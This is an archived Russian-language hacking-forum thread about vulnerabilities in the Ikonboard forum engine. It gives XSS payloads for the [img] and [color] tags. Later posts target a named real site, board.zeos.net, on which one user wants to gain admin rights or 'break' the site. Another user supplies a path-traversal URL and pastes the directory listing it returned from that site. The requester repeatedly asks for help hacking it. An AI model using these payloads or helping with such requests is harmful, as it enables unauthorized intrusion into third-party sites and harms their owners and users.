Какие Уязвимости есть в Iconboard? [Архив]

Просмотр полной версии : Какие Уязвимости есть в Iconboard?

Fr1k

19.08.2004, 10:59

Какие Уязвимости есть в Iconboard???
Знаю про баг который позволяет пользователям обратится к ограниченным ресурсам но эта дыра заклеена... существую ли ещё какие нить баги?

22.08.2004, 23:15

Парень тебе здесь никто не скажет т.к этот форум на таком движке стоит

Че Гевара

22.08.2004, 23:34

Есть xss в теге [img] ...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[IMG]javascript:alert('antichat.ru')[/IMG]
[/QUOTE]<span id='postcolor'>
И в теге [color]
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[color=red;background-image:url('javascript:alert('LOL')')]antichat[/color]
[/QUOTE]<span id='postcolor'>

m0nzt3r

28.08.2004, 10:17

ne zaplatalai diru chto li?  http://forum.antichat.ru/iB_html/non-cgi/emoticons/wow.gif

Algol

28.08.2004, 13:50

В нашем форуме это пофиксено

RAMOS

14.11.2006, 22:19

че можна зделать с board.zeos.net Можно получить права админа или просто сламать

_-[A.M.D]HiM@S-_

14.11.2006, 22:26

че можна зделать с board.zeos.net Можно получить права админа или просто сламать
Знаю я его ;)
Там действует одна из уязвимостей,которая описана в обзоре данного движка .
http://forum.antichat.ru/thread26024.html

P/s:Задрало говорить юзай поиск !

RAMOS

14.11.2006, 22:40

cgi-bin/forum/ikonboard.cgi?act=UserCP;CODE=01;MODE=1;useravatar _dir=../../../

ета уязвимость там не работает , там нет никаких ID , там есть чтото наподобие MID=90-1162285788 и ссылка там не site/cgi-bin/forum/ikonboard.cgi? , а site/cgi-bin/ikonboard.cgi? ЕСТЬ на него какието еще уязвимости

_-[A.M.D]HiM@S-_

14.11.2006, 22:48

ета уязвимость там не работает , там нет никаких ID , там есть чтото наподобие MID=90-1162285788 и ссылка там не site/cgi-bin/forum/ikonboard.cgi? , а site/cgi-bin/ikonboard.cgi? ЕСТЬ на него какието еще уязвимости

З.ы:У меня почимуто там все роботает ;)

<option value='banner.zeos.net'>banner.zeos</option>
<option value='board.zeos.net'>board.zeos</option>
<option value='cgi-bin'></option>
<option value='club.pixelfab.com'>club.pixelfab</option>
<option value='htdocs'></option>
<option value='icons'></option>
<option value='new.zeos.net'>new.zeos</option>
<option value='old.zeos.net'>old.zeos</option>
<option value='test.zeos.net'>test.zeos</option>
<option value='us.zeos.net'>us.zeos</option>
<option value='www.incubus.net'>www.incubus</option>
<option value='www.pixelfab.com'>www.pixelfab</option>
<option value='www.polar.kiev.ua'>www.polar.kiev</option>
<option value='www.zeos.net'>www.zeos</option>

RAMOS

14.11.2006, 22:53

как мне ето использовать , что писать после /cgi-bin/ikonboard.cgi?act=UserCP;CODE=01;MODE=1 , и что мне даст ета уязвимость

RAMOS

25.11.2006, 14:27

ПОМОГИТЕ МНЕ ЕГО СЛАМАТЬ